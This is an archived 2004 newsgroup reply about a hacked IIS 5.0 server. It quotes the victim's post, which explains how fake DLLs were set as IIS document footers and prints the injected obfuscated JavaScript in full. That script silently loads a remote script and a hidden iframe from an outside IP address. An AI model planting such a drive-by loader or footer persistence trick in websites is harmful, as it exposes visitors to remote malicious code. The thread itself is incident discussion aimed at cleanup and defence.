Re: Russian IIS hack? Malicious Javascript code
From: Paul Lynch (paul.lynch_at_nospam.com)
Date: 06/23/04
- Previous message: Oca Hoeflein: "Russian IIS hack? Malicious Javascript code"
- In reply to: Oca Hoeflein: "Russian IIS hack? Malicious Javascript code"
- Next in thread: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Reply: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Reply: Wes Carberry: "Re: Russian IIS hack? Malicious Javascript code"
- Reply: no_spam_at_hotmail.com: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 23 Jun 2004 02:28:40 +0100
On Tue, 22 Jun 2004 17:42:01 -0700, Oca Hoeflein <Oca
Hoeflein@discussions.microsoft.com> wrote:
>I successfully removed some malicious code from my IIS 5.0 server that may not have had all it's patches updated, but I cannot find any information on this malicious code that redirected on a random basis the users of my websites to a russian website that appeared to be down. to a domain called balamut.com
>with an IP address of 217.107.218.147 which RDNS to
>unassigned.m10-msk-ru.e-neverland.net
>
>The javascript code lived in some fake dll files in the inetsrv folder.
>One fake .dll file was created for each web on my server and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true.
>
>the offending code was embedded in every file that the website delivered and pages that had embedded .js files the javascript for those pages would not function.
>
>I have posted the offending code, mabye someone can identify this?
>
>As proof check out a google search for one of the function in the code okx12()
>
>you'll see the first link it returns is an RTF if you view the html version you'll see this code appended to the bottom of the page.
>
><script language="JavaScript"><!--
>var qxco7=document.cookie;function gc099(n21){var ix=qxco7.indexOf(n21+"=");if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;var es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new Date();var expiry=new Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}function okx12(){window.status="";setTimeout("okx12()", 200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("<script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\"></script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>
>
You're asking the wrong questions I'm afraid. Instead of trying to
track down the source of some l33t hAx0r code you should be asking
yourself 'how did this stuff get onto my server and what can I do to
secure my server and stop it happening again ?'
I'd suggest you start here :
http://securityadmin.info/faq.asp#hackerstoc
Regards,
Paul Lynch
MCSE
- Previous message: Oca Hoeflein: "Russian IIS hack? Malicious Javascript code"
- In reply to: Oca Hoeflein: "Russian IIS hack? Malicious Javascript code"
- Next in thread: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Reply: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Reply: Wes Carberry: "Re: Russian IIS hack? Malicious Javascript code"
- Reply: no_spam_at_hotmail.com: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
